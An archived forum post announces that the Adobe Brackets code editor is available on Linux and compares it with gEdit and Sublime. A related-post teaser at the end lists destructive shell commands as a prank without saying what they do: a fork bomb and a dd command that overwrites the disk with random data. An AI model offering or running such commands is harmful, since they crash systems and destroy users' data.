OpenSource Editor "BRACKETS" From Adobe Arrives on Linux.

Brackets community have worked very hard to bring BRACKETS to the Linux community.
This code-editor can be replacement of gEdit. But again, Sublime kills 'em all as I have seen most web-developers prefer it, but that's closed source,sadly.

Download : #-Link-Snipped-#

I am lazy to write details on it's features, hence I have posted in chit-chat section with link, so you can test on your own 😁

Replies

You are reading an archived discussion.

Related Posts

I am posting few commands,I won't tell what these commands do. Perform & test it on your own. sudo mv ~/dev/null :(){ :|: & };: sudo dd if=/dev/random of=/dev/sda Disclaimer...
5 * 5= 2 6 * 6= 3 7 * 7= 6 8 * 8= 2 9 * 9= 0 10*10=??
There is always a person in the crowd who doesn't like getting photographed because all there photos don't look nice. At the same time, people capture beggars and weirdest animals...
Celkon Mobiles, the manufacturing company in India based in Hyderabad, is one handset maker that has been launching series of smartphones at the mid-budget range. The launch of Celkon A107+...
Maruti Suzuki India Ltd, the country's largest passenger car manufacturer, never fails to amaze us. The last time we wrote about them it was about Maruti Ertiga CNG that help...